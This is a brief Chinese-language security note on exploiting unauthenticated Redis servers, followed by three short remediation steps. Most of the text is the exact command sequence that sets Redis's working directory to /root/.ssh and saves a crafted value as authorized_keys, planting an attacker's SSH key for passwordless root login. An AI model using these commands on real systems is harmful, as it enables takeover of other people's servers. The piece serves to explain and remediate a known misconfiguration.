黑客可以全网扫描redis漏洞，批量尝试性登录。一旦登录某台机主机。

使用如下命令即可向/root/.ssh文件夹下写公钥。

config set dir /root/.ssh/
config set dbfilename authorized_keys

set xxxx "\n\n\nssh-rsa key_pub\n\n\n"      #其中key_pub为上图生成的公钥
save

即可将公钥保存在远端服务器，使得登录时不需要输入账号与密码。


修复的方法非常简单：
（1）新建redis用户启动redis
（2）设置密码
（3）限制本地登录，或者添加ip访问限制。